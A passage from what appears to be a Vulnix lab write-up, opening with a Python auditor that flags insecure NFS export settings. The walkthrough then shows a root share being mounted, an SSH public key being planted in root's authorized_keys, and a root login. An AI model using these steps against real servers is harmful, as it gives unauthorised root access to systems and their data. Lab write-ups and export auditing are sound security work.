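walkthrough ends up with plus one constructed line (marked below)."""
import re

# "host(opt,opt)": no space between host and "("; the option list is optional.
SPEC_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text: str):
    """Return [(path, [(client, {options}), ...]), ...], one tuple per export line.

    Per exports(5): a bare path is exported to every host with default
    options, and a spec that is only "(opts)" (because a space separated it
    from its host) applies those options to every host, not to that host.
    """
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:]
        clients = []
        for spec in specs:
            m = SPEC_RE.match(spec)
            if not m:  # unbalanced parenthesis: keep the spec visible, no options
                clients.append((spec, set()))
                continue
            host, opts = m.group(1), m.group(2)
            options = {o for o in (opts or "").split(",") if o}
            clients.append((host or "*", options))
        if not clients:
            clients.append(("*", set()))
        exports.append((path, clients))
    return exports


def audit_exports(text: str):
    """Findings a reviewer would want to see, one string per finding."""
    findings = []
    for path, clients in parse_exports(text):
        for host, options in clients:
            where = f"{path} -> {host}"
            authenticated = host.startswith("gss/") or any(
                o.startswith("sec=") and o != "sec=sys" for o in options)
            if host == "*":
                findings.append(f"{where}: exported to any host; restrict to a host, netgroup or CIDR")
            if "no_root_squash" in options:
                findings.append(f"{where}: no_root_squash lets a remote uid 0 act as local root")
            if path == "/" or path == "/root" or path.startswith("/root/"):
                findings.append(f"{where}: exporting a system directory; export only data paths")
            if "rw" in options and not authenticated:
                findings.append(f"{where}: rw with AUTH_SYS only; client-asserted uids are trusted")
    return findings


SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)
# constructed line: the space before (rw) exports /srv/data read-write to every host
/srv/data 192.168.56.0/24 (rw)
"""

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

Run against the walkthrough's file, the /root line produces four findings (wildcard host, no_root_squash, system directory, unauthenticated rw), while the original /home/vulnix line produces two: the wildcard and the reliance on client-asserted uids, which is exactly the weakness the uid 2008 trick used.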

root@kali:~/vulnix# showmount -e 192.168.56.16
Export list for 192.168.56.16:
/root * >>>>>>>>
/home/vulnix *
root@kali:~/vulnix#

and we can see our root share.

Let's access the root share using the same mount command used earlier.

Unmount the existing share.

root@kali:~/vulnix# umount -f /root/vulnix/mnt
root@kali:~/vulnix#

Mount it again.

root@kali:~/vulnix# mount -o vers=3 192.168.56.16:/root mnt
root@kali:~/vulnix# cd mnt/

root@kali:~/vulnix/mnt# ls -alrth
total 28K
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
-rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc
-rw------- 1 root root 710 Sep 2 2012 .viminfo
-r-------- 1 root root 33 Sep 2 2012 trophy.txt >>>>>>>>
drwx------ 2 root root 4.0K Sep 2 2012 .cache
-rw------- 1 root root 0 Sep 2 2012 .bash_history
drwx------ 3 root root 4.0K Sep 2 2012 .
drwxr-xr-x 3 root root 4.0K Aug 10 17:24 ..

root@kali:~/vulnix/mnt# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
root@kali:~/vulnix/mnt#

and we have trophy.txt, so our job is done.

We found the final flag on the machine. But did you notice that we still don't have root access on the target machine?

Earlier we had vulnix@vulnix (when we logged in to the target machine as the vulnix user), but we don't have root@vulnix access.

Can we somehow get that access?

Can we use the same public/private key technique to SSH into the machine as the root user?

Let's try that.

Same as before, we need to copy the public key into the .ssh/authorized_keys file. We can use the existing public key; no need to generate new keys.

root@kali:~/vulnix/mnt# mkdir .ssh
root@kali:~/vulnix/mnt# cd .ssh
root@kali:~/vulnix/mnt/.ssh# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrgyNNgtxvnMs6qF7IR2X9eAwb6U5KRlmjnICvDE1m9+wE4D34NdTPuEtY024kEr4yV++9SY9srM/t+cBi1Z6fXgAp8QSAZTltM7SlGzHFZA01WfsK+AWrWSMHlNta8UdSNOdlMD7hdwJHQU5tEvPdSSLjJaOHHxFG3OAaXnEXNlS08Z1qt/2i7Z4ZXwRx2lyWfw3IURlytJLv7P57wb4aaIk0aKsxFRW4DccdlYSNna2TjEvWOtse7+fdoYCyNzHYoseUqgi09Wx4oEep543BlJ6h4dt7E3oep95kP9REIvoU8qvUS2wk+GJF6670X8jCafJSoQRy7C3sXyWiWtXz root@kali" >authorized_keys
root@kali:~/vulnix/mnt/.ssh#
root@kali:~/vulnix/mnt/.ssh#
root@kali:~/vulnix/mnt/.ssh#
root@kali:~/vulnix/mnt/.ssh# ls -alrth
total 12K
drwx------ 4 root root 4.0K Aug 10 2019 ..
drwxr-xr-x 2 root root 4.0K Aug 10 2019 .
-rw-r--r-- 1 root root 391 Aug 10 2019 authorized_keys

Now let's use the private key to log in as root via SSH.

root@kali:~/vulnix# ssh -i keys root@192.168.56.16
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Aug 10 23:59:15 BST 2019

  System load:  0.0              Processes:           89
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 3%               IP address for eth0: 192.168.56.16
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

root@vulnix:~#

and we have logged in as root on the target machine.

Thanks for staying till the end 🙂

Learnt a lot.
